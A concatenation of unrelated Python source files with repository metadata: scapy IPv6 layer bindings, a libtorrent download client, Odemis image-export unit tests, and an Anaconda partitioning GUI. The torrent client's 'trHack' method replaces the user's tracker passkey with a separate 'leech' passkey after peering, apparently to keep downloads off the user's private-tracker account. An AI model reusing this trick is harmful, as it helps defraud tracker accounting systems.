iface=iface)
#############################################################################
#############################################################################
### Layers binding ###
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
bind_layers(Ether, IPv6, type = 0x86dd )
bind_layers(CookedLinux, IPv6, proto = 0x86dd )
bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP )
bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP )
bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP )
bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP )
bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
|
AmedeoSapio/scapy
|
scapy/layers/inet6.py
|
Python
|
gpl-2.0
| 144,648
|
#!/usr/bin/python2.7
from threading import Thread, activeCount
import libtorrent as lt
from time import sleep, time
import sys
import os
sys.dont_write_bytecode = True
state_str = ['queued', 'checking', 'downloading metadata', 'downloading',
'finished', 'seeding', 'allocating', 'checking fastresume']
#
# TORRENT THREAD
#
class TORRENTTHREAD(Thread):
toStop = False
#
# Init
# param: torrent_file: string
#
def __init__(self, torrentFile):
super(TORRENTTHREAD, self).__init__()
self.output = os.path.dirname(torrentFile)
self.torrentFile = torrentFile
self.info = lt.torrent_info(torrentFile)
# GUI
self.EditGui = None
self.ItemGui = None
self.PrintStatus = False
# Replace tracker parameters
self.replacePasskey = False
self.userPasskey = ''
self.leechPasskey = ''
# Limits
self.downloadLimit = 9000000
self.uploadLimit = 500000
#
# Print a message
# param: message: string
#
def Print(self, message):
if self.EditGui:
self.EditGui(self.ItemGui, message)
if self.PrintStatus:
print self.info.name() + ' - ' + message
self.PrintStatus = False
#
# Get Torrent name
#
def GetTorrentName(self):
return self.info.name()
#
# Print torrent status
#
def GetStatus(self):
self.PrintStatus = True
#
# Set Gui Function
# param: EditGui, type: Function
#
def SetEditGui(self, EditGui):
self.EditGui = EditGui
#
# Set Edit Gui item
# param: item, type: string
#
def SetItem(self, item):
self.ItemGui = item
#
# Set download limit
# param: downloadLimit, type: int
#
def SetDownloadLimit(self, downloadLimit):
self.downloadLimit = downloadLimit
#
# Set upload limit
# param: uploadLimite, type: int
#
def SetUploadLimit(self, uploadLimit):
self.uploadLimit = uploadLimit
#
# Set output path
# param: output, type: string
#
def SetOutput(self, output):
self.output = output
#
# Set undesirable and new trackersi
# param userPasskey, type: string
# param leechPasskey, type: string
#
def SetPasskey(self, userPasskey, leechPasskey):
if userPasskey and leechPasskey:
self.userPasskey = userPasskey
self.leechPasskey = leechPasskey
self.replacePasskey = True
#
# Start
#
def run(self):
# New Session
# fingerprint = lt.fingerprint("AZ", 3, 0, 5, 0)
# settings = lt.session_settings()
# settings.user_agent = "Azerus 3.0.5.0"
# ses = lt.session(fingerprint)
ses = lt.session()
ses.listen_on(6881, 6891)
self.torrentHandle = ses.add_torrent({
'ti': self.info,
'save_path': self.output,
})
self.torrentHandle.set_download_limit(10000)
self.torrentHandle.set_upload_limit(self.uploadLimit)
self.torrentHandle.set_sequential_download(True)
# New Torrent
torrentName = self.torrentHandle.name()
self.Print('INITIALISATION')
# Replace Tracker
if self.replacePasskey:
self.trHack()
# Downloading
if(not self.torrentHandle.is_seed()):
self.Downloading()
del ses
# Stop if needed
if self.toStop:
return
# Complete
self.PrintStatus = True
self.Print('COMPLETED')
os.remove(self.torrentFile)
#
# Replace a user passkey after peering and download with a new one
#
def trHack(self):
newTorrentTrackers = []
for tracker in self.torrentHandle.trackers():
if self.userPasskey in tracker['url']:
tracker['url'] = self.leechPasskey
newTorrentTrackers.append(tracker)
# Peering
if len(newTorrentTrackers) > 0:
if (self.torrentHandle.status().num_peers < 1) and\
not self.torrentHandle.is_seed():
self.Peering()
self.torrentHandle.replace_trackers(newTorrentTrackers)
#
# Get peers list
#
def Peering(self):
torrentStatus = self.torrentHandle.status()
start = time()
while (not self.toStop and (torrentStatus.num_peers < 1) and
not self.torrentHandle.is_seed() and
not torrentStatus.paused):
if (torrentStatus.state == 1):
infosSTR = '%.2f%% %s' % (torrentStatus.progress * 100,
state_str[torrentStatus.state])
else:
infosSTR = 'Checking for peers: %d' %\
(torrentStatus.num_peers)
now = time()
if now-start > 60:
self.toStop = True
self.PrintStatus = True
infoSTR = 'NO PEERS FOUND'
break
self.Print(infosSTR)
sleep(.5)
torrentStatus = self.torrentHandle.status()
if torrentStatus.paused and torrentStatus.error:
self.toStop = True
self.PrintStatus = True
self.Print(torrentStatus.error)
#
# Downloading
#
def Downloading(self):
torrentStatus = self.torrentHandle.status()
while (not self.toStop and not self.torrentHandle.is_seed()):
if (torrentStatus.state == 1):
infosSTR = '%.2f%% %s' % (torrentStatus.progress * 100,
state_str[torrentStatus.state])
else:
infosSTR = ('%.2f%% (down: %.1f kb/s up:' +
'%.1f kB/s peers: %d)) %s') %\
(torrentStatus.progress * 100,
torrentStatus.download_rate / 1000,
torrentStatus.upload_rate / 1000,
torrentStatus.num_peers,
state_str[torrentStatus.state])
self.Print(infosSTR)
sleep(.1)
torrentStatus = self.torrentHandle.status()
self.torrentHandle.set_download_limit(self.downloadLimit)
#
# Stop
#
def Stop(self):
self.toStop = True
self.Print('STOPPED')
return
|
MisterDaneel/pytorrentClient
|
libs/my_libtorrent.py
|
Python
|
gpl-2.0
| 6,445
|
# -*- coding: utf-8 -*-
'''
Created on 19 Sep 2012
@author: piel
Copyright © 2012-2013 Éric Piel & Kimon Tsitsikas, Delmic
This file is part of Odemis.
Odemis is free software: you can redistribute it and/or modify it under the terms
of the GNU General Public License version 2 as published by the Free Software
Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
Odemis. If not, see http://www.gnu.org/licenses/.
'''
from __future__ import division
import cairo
import logging
import math
import numpy
import os
import time
import unittest
import wx
from odemis import model, dataio
from odemis.acq import stream
from odemis.gui.util import img
from odemis.gui.util.img import wxImage2NDImage, format_rgba_darray
logging.getLogger().setLevel(logging.DEBUG)
def GetRGB(im, x, y):
"""
return the r,g,b tuple corresponding to a pixel
"""
r = im.GetRed(x, y)
g = im.GetGreen(x, y)
b = im.GetBlue(x, y)
return (r, g, b)
class TestWxImage2NDImage(unittest.TestCase):
def test_simple(self):
size = (32, 64)
wximage = wx.EmptyImage(*size) # black RGB
ndimage = wxImage2NDImage(wximage)
self.assertEqual(ndimage.shape[0:2], size[-1:-3:-1])
self.assertEqual(ndimage.shape[2], 3) # RGB
self.assertTrue((ndimage[0, 0] == [0, 0, 0]).all())
# TODO alpha channel
class TestRGBA(unittest.TestCase):
def test_rgb_to_bgra(self):
size = (32, 64, 3)
rgbim = model.DataArray(numpy.zeros(size, dtype=numpy.uint8))
rgbim[:, :, 0] = 1
rgbim[:, :, 1] = 100
rgbim[:, :, 2] = 200
bgraim = format_rgba_darray(rgbim, 255)
# Checks it added alpha channel
self.assertEqual(bgraim.shape, (32, 64, 4))
self.assertEqual(bgraim[0, 0, 3], 255)
# Check the channels were swapped to BGR
self.assertTrue((bgraim[1, 1] == [200, 100, 1, 255]).all())
def test_rgb_alpha_to_bgra(self):
size = (32, 64, 3)
rgbim = model.DataArray(numpy.zeros(size, dtype=numpy.uint8))
rgbim[:, :, 0] = 1
rgbim[:, :, 1] = 100
rgbim[:, :, 2] = 200
bgraim = format_rgba_darray(rgbim, 0)
# Checks it added alpha channel and set everything to scale
self.assertEqual(bgraim.shape, (32, 64, 4))
self.assertTrue((bgraim == 0).all())
def test_rgba_to_bgra(self):
size = (32, 64, 4)
rgbaim = model.DataArray(numpy.zeros(size, dtype=numpy.uint8))
rgbaim[:, :, 0] = 1
rgbaim[:, :, 1] = 100
rgbaim[:, :, 2] = 200
rgbaim[:, :, 3] = 255
rgbaim[2, 2, 3] = 0
bgraim = format_rgba_darray(rgbaim)
# Checks it added alpha channel
self.assertEqual(bgraim.shape, (32, 64, 4))
# Check the channels were swapped to BGR
self.assertTrue((bgraim[1, 1] == [200, 100, 1, 255]).all())
self.assertTrue((bgraim[2, 2] == [200, 100, 1, 0]).all())
class TestARExport(unittest.TestCase):
def test_ar_frame(self):
ar_margin = 100
img_size = 512, 512
ar_size = img_size[0] + ar_margin, img_size[1] + ar_margin
data_to_draw = numpy.zeros((ar_size[1], ar_size[0], 4), dtype=numpy.uint8)
surface = cairo.ImageSurface.create_for_data(
data_to_draw, cairo.FORMAT_ARGB32, ar_size[0], ar_size[1])
ctx = cairo.Context(surface)
app = wx.App() # needed for the gui font name
font_name = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT).GetFaceName()
tau = 2 * math.pi
ticksize = 10
num_ticks = 6
ticks_info = img.ar_create_tick_labels(img_size, ticksize, num_ticks, tau, ar_margin / 2)
ticks, (center_x, center_y), inner_radius, radius = ticks_info
# circle expected just on the center of the frame
self.assertEqual((center_x, center_y), (ar_size[0] / 2, ar_size[1] / 2))
self.assertLess(radius, ar_size[0] / 2) # circle radius within limits
img.draw_ar_frame(ctx, ar_size, ticks, font_name, center_x, center_y, inner_radius, radius, tau)
self.assertEqual(data_to_draw.shape[:2], ar_size) # frame includes the margin
def test_ar_raw(self):
data = model.DataArray(numpy.zeros((256, 256)), metadata={model.MD_AR_POLE: (100, 100),
model.MD_PIXEL_SIZE: (1e-03, 1e-03)})
raw_polar = img.calculate_raw_ar(data, data)
# shape = raw data + theta/phi axes values
self.assertGreater(raw_polar.shape[0], 50)
self.assertGreater(raw_polar.shape[1], 50)
def test_ar_export(self):
filename = "test-ar.csv"
# Create AR data
md = {
model.MD_SW_VERSION: "1.0-test",
model.MD_HW_NAME: "fake ccd",
model.MD_DESCRIPTION: "AR",
model.MD_ACQ_TYPE: model.MD_AT_AR,
model.MD_ACQ_DATE: time.time(),
model.MD_BPP: 12,
model.MD_BINNING: (1, 1), # px, px
model.MD_SENSOR_PIXEL_SIZE: (13e-6, 13e-6), # m/px
model.MD_PIXEL_SIZE: (2e-5, 2e-5), # m/px
model.MD_POS: (1.2e-3, -30e-3), # m
model.MD_EXP_TIME: 1.2, # s
model.MD_AR_POLE: (253.1, 65.1),
model.MD_LENS_MAG: 0.4, # ratio
}
md0 = dict(md)
data0 = model.DataArray(1500 + numpy.zeros((512, 512), dtype=numpy.uint16), md0)
md1 = dict(md)
md1[model.MD_POS] = (1.5e-3, -30e-3)
md1[model.MD_BASELINE] = 300 # AR background should take this into account
data1 = model.DataArray(3345 + numpy.zeros((512, 512), dtype=numpy.uint16), md1)
# Create AR stream
ars = stream.StaticARStream("test", [data0, data1])
ars.point.value = md1[model.MD_POS]
# Convert to exportable RGB image
exdata = img.ar_to_export_data([ars], raw=True)
# shape = raw data + theta/phi axes values
self.assertGreater(exdata.shape[0], 50)
self.assertGreater(exdata.shape[1], 50)
# Save into a CSV file
exporter = dataio.get_converter("CSV")
exporter.export(filename, exdata)
st = os.stat(filename) # this test also that the file is created
self.assertGreater(st.st_size, 100)
# clean up
try:
os.remove(filename)
except Exception:
pass
# TODO: check that exporting large AR image doesn't get crazy memory usage
def test_big_ar_export(self):
filename = "test-ar.csv"
# Create AR data
md = {
model.MD_SW_VERSION: "1.0-test",
model.MD_HW_NAME: "fake ccd",
model.MD_DESCRIPTION: "AR",
model.MD_ACQ_TYPE: model.MD_AT_AR,
model.MD_ACQ_DATE: time.time(),
model.MD_BPP: 12,
model.MD_BINNING: (1, 1), # px, px
model.MD_SENSOR_PIXEL_SIZE: (13e-6, 13e-6), # m/px
model.MD_PIXEL_SIZE: (2e-5, 2e-5), # m/px
model.MD_POS: (1.2e-3, -30e-3), # m
model.MD_EXP_TIME: 1.2, # s
model.MD_AR_POLE: (253.1, 65.1),
model.MD_LENS_MAG: 0.4, # ratio
}
md0 = dict(md)
data0 = model.DataArray(1500 + numpy.zeros((1080, 1024), dtype=numpy.uint16), md0)
# Create AR stream
ars = stream.StaticARStream("test", [data0])
ars.point.value = md0[model.MD_POS]
# Convert to exportable RGB image
exdata = img.ar_to_export_data([ars], raw=True)
# shape = raw data + theta/phi axes values
self.assertGreater(exdata.shape[0], 50)
self.assertGreater(exdata.shape[1], 50)
# Save into a CSV file
exporter = dataio.get_converter("CSV")
exporter.export(filename, exdata)
st = os.stat(filename) # this test also that the file is created
self.assertGreater(st.st_size, 100)
# clean up
try:
os.remove(filename)
except Exception:
pass
class TestSpectrumExport(unittest.TestCase):
def setUp(self):
self.spectrum = model.DataArray(numpy.linspace(0, 750, 200),
metadata={model.MD_ACQ_TYPE: model.MD_AT_SPECTRUM})
self.spectrum_range = numpy.linspace(4.7e-07, 1.02e-06, 200)
self.unit = "m"
self.app = wx.App() # needed for the gui font name
def test_spectrum_ready(self):
exported_data = img.spectrum_to_export_data(self.spectrum, False, self.unit, self.spectrum_range)
self.assertEqual(exported_data.metadata[model.MD_DIMS], 'YXC') # ready for RGB export
self.assertEqual(exported_data.shape[:2],
(img.SPEC_PLOT_SIZE + img.SPEC_SCALE_HEIGHT + img.SMALL_SCALE_WIDTH,
img.SPEC_PLOT_SIZE + img.SPEC_SCALE_WIDTH + img.SMALL_SCALE_WIDTH)) # exported image includes scale bars
def test_spectrum_raw(self):
filename = "test-spec-spot.csv"
exported_data = img.spectrum_to_export_data(self.spectrum, True, self.unit, self.spectrum_range)
self.assertEqual(exported_data.shape[0], len(self.spectrum_range)) # exported image includes only raw data
# Save into a CSV file
exporter = dataio.get_converter("CSV")
exporter.export(filename, exported_data)
st = os.stat(filename) # this test also that the file is created
self.assertGreater(st.st_size, 10)
# clean up
try:
os.remove(filename)
except Exception:
pass
class TestSpectrumLineExport(unittest.TestCase):
def setUp(self):
self.spectrum = model.DataArray(numpy.zeros(shape=(5, 1340, 3)),
metadata={model.MD_PIXEL_SIZE: (None, 4.2e-06),
model.MD_ACQ_TYPE: model.MD_AT_SPECTRUM})
self.spectrum_range = numpy.linspace(4.7e-07, 1.02e-06, 200)
self.unit = "m"
self.app = wx.App() # needed for the gui font name
def test_line_ready(self):
exported_data = img.line_to_export_data(self.spectrum, False, self.unit, self.spectrum_range)
self.assertEqual(exported_data.metadata[model.MD_DIMS], 'YXC') # ready for RGB export
self.assertEqual(exported_data.shape[:2],
(img.SPEC_PLOT_SIZE + img.SPEC_SCALE_HEIGHT + img.SMALL_SCALE_WIDTH,
img.SPEC_PLOT_SIZE + img.SPEC_SCALE_WIDTH + img.SMALL_SCALE_WIDTH)) # exported image includes scale bars
def test_line_raw(self):
filename = "test-spec-line.csv"
exported_data = img.line_to_export_data(self.spectrum, True, self.unit, self.spectrum_range)
self.assertEqual(exported_data.shape[0], self.spectrum.shape[1])
self.assertEqual(exported_data.shape[1], self.spectrum.shape[0])
# Save into a CSV file
exporter = dataio.get_converter("CSV")
exporter.export(filename, exported_data)
st = os.stat(filename) # this test also that the file is created
self.assertGreater(st.st_size, 100)
# clean up
try:
os.remove(filename)
except Exception:
pass
class TestSpatialExport(unittest.TestCase):
def setUp(self):
self.app = wx.App()
data = numpy.zeros((2160, 2560), dtype=numpy.uint16)
dataRGB = numpy.zeros((2160, 2560, 4))
metadata = {'Hardware name': 'Andor ZYLA-5.5-USB3 (s/n: VSC-01959)',
'Exposure time': 0.3, 'Pixel size': (1.59604600574173e-07, 1.59604600574173e-07),
'Acquisition date': 1441361559.258568, 'Hardware version': "firmware: '14.9.16.0' (driver 3.10.30003.5)",
'Centre position': (-0.001203511795256, -0.000295338300158), 'Lens magnification': 40.0,
'Input wavelength range': (6.15e-07, 6.350000000000001e-07), 'Shear':-4.358492733391727e-16,
'Description': 'Filtered colour 1', 'Bits per pixel': 16, 'Binning': (1, 1), 'Pixel readout time': 1e-08,
'Gain': 1.1, 'Rotation': 6.279302551026012, 'Light power': 0.0, 'Display tint': (255, 0, 0),
'Output wavelength range': (6.990000000000001e-07, 7.01e-07)}
image = model.DataArray(data, metadata)
fluo_stream = stream.StaticFluoStream(metadata['Description'], image)
fluo_stream.image.value = model.DataArray(dataRGB, metadata)
data = numpy.zeros((1024, 1024), dtype=numpy.uint16)
dataRGB = numpy.zeros((1024, 1024, 4))
metadata = {'Hardware name': 'pcie-6251', 'Description': 'Secondary electrons',
'Exposure time': 3e-06, 'Pixel size': (5.9910982493639e-08, 6.0604642506361e-08),
'Acquisition date': 1441361562.0, 'Hardware version': 'Unknown (driver 2.1-160-g17a59fb (driver ni_pcimio v0.7.76))',
'Centre position': (-0.001203511795256, -0.000295338300158), 'Lens magnification': 5000.0, 'Rotation': 0.0,
'Shear': 0.003274715695854}
image = model.DataArray(data, metadata)
sem_stream = stream.StaticSEMStream(metadata['Description'], image)
sem_stream.image.value = model.DataArray(dataRGB, metadata)
self.streams = [fluo_stream, sem_stream]
self.min_res = (623, 432)
def test_no_crop_need(self):
"""
Data roi covers the whole window view
"""
view_hfw = (0.00025158414075691866, 0.00017445320835792754)
view_pos = [-0.001211588332679978, -0.00028726176273402186]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data([self.streams[0]], view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(exp_data[0].shape, (1226, 1576, 4)) # RGB
def test_crop_need(self):
"""
Data roi covers part of the window view thus we need to crop the
intersection with the data
"""
view_hfw = (0.0005031682815138373, 0.0003489064167158551)
view_pos = [-0.001211588332679978, -0.00028726176273402186]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data([self.streams[0]], view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(exp_data[0].shape, (2340, 2560, 4)) # RGB
def test_crop_and_interpolation_need(self):
"""
Data roi covers part of the window view and data resolution is below
the minimum limit thus we need to interpolate the data in order to
keep the shape ratio unchanged
"""
view_hfw = (0.0010063365630276746, 0.0006978128334317102)
view_pos = [-0.0015823014004405739, -0.0008081984265806109]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data([self.streams[0]], view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(exp_data[0].shape, (182, 1673, 4)) # RGB
def test_multiple_streams(self):
# Print ready format
view_hfw = (8.191282393266523e-05, 6.205915392651362e-05)
view_pos = [-0.001203511795256, -0.000295338300158]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data(self.streams, view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(len(exp_data), 1)
self.assertEqual(len(exp_data[0].shape), 3) # RGB
# Post-process format
exp_data = img.images_to_export_data(self.streams, view_hfw, view_pos, draw_merge_ratio, True)
self.assertEqual(len(exp_data), 2)
self.assertEqual(len(exp_data[0].shape), 2) # grayscale
self.assertEqual(len(exp_data[1].shape), 2) # grayscale
self.assertEqual(exp_data[0].shape, exp_data[1].shape) # all exported images must have the same shape
def test_no_intersection(self):
"""
Data has no intersection with the window view
"""
view_hfw = (0.0001039324002586505, 6.205915392651362e-05)
view_pos = [-0.00147293527265202, -0.0004728408264424368]
draw_merge_ratio = 0.3
with self.assertRaises(LookupError):
img.images_to_export_data(self.streams, view_hfw, view_pos, draw_merge_ratio, False)
def test_thin_column(self):
"""
Test that minimum width limit is fulfilled in case only a very thin
column of data is in the view
"""
view_hfw = (8.191282393266523e-05, 6.205915392651362e-05)
view_pos = [-0.0014443006338779269, -0.0002968821446105185]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data(self.streams, view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(len(exp_data), 1)
self.assertEqual(len(exp_data[0].shape), 3) # RGB
self.assertEqual(exp_data[0].shape[1], img.CROP_RES_LIMIT)
if __name__ == "__main__":
unittest.main()
|
ktsitsikas/odemis
|
src/odemis/gui/util/test/img_test.py
|
Python
|
gpl-2.0
| 17,106
|
#
# partition_gui.py: allows the user to choose how to partition their disks
#
# Matt Wilson <msw@redhat.com>
# Michael Fulbright <msf@redhat.com>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gobject
import gtk
try:
import gnomecanvas
except ImportError:
import gnome.canvas as gnomecanvas
import pango
import autopart
import gui
import parted
import string
import copy
import types
import raid
from constants import *
import lvm
import isys
from iw_gui import *
from flags import flags
import lvm_dialog_gui
import raid_dialog_gui
import partition_dialog_gui
from rhpl.translate import _, N_
from partitioning import *
from partIntfHelpers import *
from partedUtils import *
from fsset import *
from partRequests import *
from constants import *
from partition_ui_helpers_gui import *
import logging
log = logging.getLogger("anaconda")
STRIPE_HEIGHT = 35.0
LOGICAL_INSET = 3.0
CANVAS_WIDTH_800 = 490
CANVAS_WIDTH_640 = 390
CANVAS_HEIGHT = 200
TREE_SPACING = 2
MODE_ADD = 1
MODE_EDIT = 2
# XXXX temporary image data
new_checkmark = "GdkP"
new_checkmark = new_checkmark + "\0\0\2X"
new_checkmark = new_checkmark + "\1\1\0\2"
new_checkmark = new_checkmark + "\0\0\0""0"
new_checkmark = new_checkmark + "\0\0\0\14"
new_checkmark = new_checkmark + "\0\0\0\14"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&\0\0\0\217\0\0\0""3\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0,\0\0\0\252"
new_checkmark = new_checkmark + "\0\0\0\254\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0#\0\0\0\246\0\0\0\264\0\0\0\227\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\221\0\0\0\264\0\0\0\264"
new_checkmark = new_checkmark + "\0\0\0\214\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0U\0\0\0\264\0\0\0\264\0\0\0\202\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\40"
new_checkmark = new_checkmark + "\0\0\0\222\0\0\0\37\0\0\0\0\0\0\0\26\0\0\0\252\0\0\0\264\0\0\0\214\0"
new_checkmark = new_checkmark + "\0\0\16\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0u\0\0\0\264\0\0\0\240\0\0\0'\0\0"
new_checkmark = new_checkmark + "\0l\0\0\0\264\0\0\0\254\0\0\0!\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\24\0\0\0"
new_checkmark = new_checkmark + "\207\0\0\0\256\0\0\0\264\0\0\0\240\0\0\0\256\0\0\0\264\0\0\0d\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0;\0\0\0\233\0\0\0\263\0"
new_checkmark = new_checkmark + "\0\0\264\0\0\0\252\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\15\0\0\0r\0\0\0\263\0\0\0i\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0g\0\0"
new_checkmark = new_checkmark + "\0\"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
class DiskStripeSlice:
def eventHandler(self, widget, event):
if event.type == gtk.gdk.BUTTON_PRESS:
if event.button == 1:
self.parent.selectSlice(self.partition, 1)
elif event.type == gtk.gdk._2BUTTON_PRESS:
self.editCb()
return True
def shutDown(self):
self.parent = None
if self.group:
self.group.destroy()
self.group = None
del self.partition
def select(self):
if self.partition.type != parted.PARTITION_EXTENDED:
self.group.raise_to_top()
self.box.set(outline_color="red")
self.box.set(fill_color=self.selectColor())
def deselect(self):
self.box.set(outline_color="black", fill_color=self.fillColor())
def getPartition(self):
return self.partition
def fillColor(self):
if self.partition.type & parted.PARTITION_FREESPACE:
return "grey88"
return "white"
def selectColor(self):
if self.partition.type & parted.PARTITION_FREESPACE:
return "cornsilk2"
return "cornsilk1"
def hideOrShowText(self):
return
if self.box.get_bounds()[2] < self.text.get_bounds()[2]:
self.text.hide()
else:
self.text.show()
def sliceText(self):
if self.partition.type & parted.PARTITION_EXTENDED:
return ""
if self.partition.type & parted.PARTITION_FREESPACE:
rc = "Free\n"
else:
rc = "%s\n" % (get_partition_name(self.partition),)
rc = rc + "%Ld MB" % (getPartSizeMB(self.partition),)
return rc
def getDeviceName(self):
return get_partition_name(self.partition)
def update(self):
disk = self.parent.getDisk()
totalSectors = float(disk.dev.heads
* disk.dev.sectors
* disk.dev.cylinders)
# XXX hack but will work for now
if gtk.gdk.screen_width() > 640:
width = CANVAS_WIDTH_800
else:
width = CANVAS_WIDTH_640
xoffset = self.partition.geom.start / totalSectors * width
xlength = self.partition.geom.length / totalSectors * width
if self.partition.type & parted.PARTITION_LOGICAL:
yoffset = 0.0 + LOGICAL_INSET
yheight = STRIPE_HEIGHT - (LOGICAL_INSET * 2)
texty = 0.0
else:
yoffset = 0.0
yheight = STRIPE_HEIGHT
texty = LOGICAL_INSET
self.group.set(x=xoffset, y=yoffset)
self.box.set(x1=0.0, y1=0.0, x2=xlength,
y2=yheight, fill_color=self.fillColor(),
outline_color='black', width_units=1.0)
self.text.set(x=2.0, y=texty + 2.0, text=self.sliceText(),
fill_color='black',
anchor=gtk.ANCHOR_NW, clip=True,
clip_width=xlength-1, clip_height=yheight-1)
self.hideOrShowText()
def __init__(self, parent, partition, treeView, editCb):
self.text = None
self.partition = partition
self.parent = parent
self.treeView = treeView
self.editCb = editCb
pgroup = parent.getGroup()
self.group = pgroup.add(gnomecanvas.CanvasGroup)
self.box = self.group.add(gnomecanvas.CanvasRect)
self.group.connect("event", self.eventHandler)
self.text = self.group.add(gnomecanvas.CanvasText,
font="sans", size_points=8)
self.update()
class DiskStripe:
def __init__(self, drive, disk, group, tree, editCb):
self.disk = disk
self.group = group
self.tree = tree
self.drive = drive
self.slices = []
self.hash = {}
self.editCb = editCb
self.selected = None
# XXX hack but will work for now
if gtk.gdk.screen_width() > 640:
width = CANVAS_WIDTH_800
else:
width = CANVAS_WIDTH_640
group.add(gnomecanvas.CanvasRect, x1=0.0, y1=10.0, x2=width,
y2=STRIPE_HEIGHT, fill_color='green',
outline_color='grey71', width_units=1.0)
group.lower_to_bottom()
def shutDown(self):
while self.slices:
slice = self.slices.pop()
slice.shutDown()
if self.group:
self.group.destroy()
self.group = None
del self.disk
def holds(self, partition):
return self.hash.has_key(partition)
def getSlice(self, partition):
return self.hash[partition]
def getDisk(self):
return self.disk
def getDrive(self):
return self.drive
def getGroup(self):
return self.group
def selectSlice(self, partition, updateTree=0):
self.deselect()
slice = self.hash[partition]
slice.select()
# update selection of the tree
if updateTree:
self.tree.selectPartition(partition)
self.selected = slice
def deselect(self):
if self.selected:
self.selected.deselect()
self.selected = None
def add(self, partition):
stripe = DiskStripeSlice(self, partition, self.tree, self.editCb)
self.slices.append(stripe)
self.hash[partition] = stripe
class DiskStripeGraph:
def __init__(self, tree, editCb):
self.canvas = gnomecanvas.Canvas()
self.diskStripes = []
self.textlabels = []
self.tree = tree
self.editCb = editCb
self.next_ypos = 0.0
def __del__(self):
self.shutDown()
def shutDown(self):
# remove any circular references so we can clean up
while self.diskStripes:
stripe = self.diskStripes.pop()
stripe.shutDown()
while self.textlabels:
lab = self.textlabels.pop()
lab.destroy()
self.next_ypos = 0.0
def getCanvas(self):
return self.canvas
def selectSlice(self, partition):
for stripe in self.diskStripes:
stripe.deselect()
if stripe.holds(partition):
stripe.selectSlice(partition)
def getSlice(self, partition):
for stripe in self.diskStripes:
if stripe.holds(partition):
return stripe.getSlice(partition)
def getDisk(self, partition):
for stripe in self.diskStripes:
if stripe.holds(partition):
return stripe.getDisk()
def add(self, drive, disk):
# yoff = len(self.diskStripes) * (STRIPE_HEIGHT + 5)
yoff = self.next_ypos
text = self.canvas.root().add(gnomecanvas.CanvasText,
x=0.0, y=yoff,
font="sans",
size_points=9)
show_geometry = 0
if drive.find('mapper/mpath') != -1:
modelInfo = isys.getMpathModel(drive)
else:
modelInfo = disk.dev.model
if show_geometry:
drivetext = _("Drive %s (Geom: %s/%s/%s) "
"(Model: %s)") % ('/dev/' + drive,
disk.dev.cylinders,
disk.dev.heads,
disk.dev.sectors,
modelInfo)
else:
drivetext = _("Drive %s (%-0.f MB) "
"(Model: %s)") % ('/dev/' + drive,
partedUtils.getDeviceSizeMB(disk.dev),
modelInfo)
text.set(text=drivetext, fill_color='black', anchor=gtk.ANCHOR_NW,
weight=pango.WEIGHT_BOLD)
(xxx1, yyy1, xxx2, yyy2) = text.get_bounds()
textheight = yyy2 - yyy1 + 2
self.textlabels.append(text)
group = self.canvas.root().add(gnomecanvas.CanvasGroup,
x=0, y=yoff+textheight)
stripe = DiskStripe(drive, disk, group, self.tree, self.editCb)
self.diskStripes.append(stripe)
self.next_ypos = self.next_ypos + STRIPE_HEIGHT+textheight+10
return stripe
